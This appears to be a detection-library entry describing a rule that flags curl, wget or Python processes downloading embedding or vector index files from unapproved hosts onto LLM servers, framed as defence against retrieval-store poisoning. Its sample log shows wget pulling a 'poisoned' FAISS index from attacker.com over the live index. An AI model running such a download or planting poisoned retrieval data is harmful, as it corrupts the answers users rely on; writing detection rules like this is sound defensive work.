Detection Library
mediumexperimentalLinuxAI/MLNetworkT1105

LLM Service Downloading Embeddings Or Index Files From External Host

Detects curl, wget, or Python processes downloading files with embedding or vector index extensions from external hosts not in the OCI baseline. This pattern indicates replacement of the vector store with externally sourced, potentially poisoned content.

Updated Jan 15, 2025 · Detection Engineering Team

llmvector-embeddinglinuxdownloadowasp-llm08

Problem Statement

Downloading embedding or vector index files from external hosts at runtime bypasses integrity controls and can introduce poisoned retrieval data that corrupts RAG-based model responses.

Sample Logs

{"timestamp":"2025-01-15T07:33:18Z","computer_name":"llm-host-02","user":"llm_svc","image":"/usr/bin/wget","command_line":"wget https://attacker.com/poisoned_index.faiss -O /opt/llm/vector/index.faiss"}

Required Fields

image
command_line
user
computer_name

False Positives

  • ·Approved data pipeline scripts that download embedding files from HuggingFace or other approved hosts

Tuning Guidance

Add approved external embedding sources to the filter. Most production environments should not download embedding files from external hosts at runtime.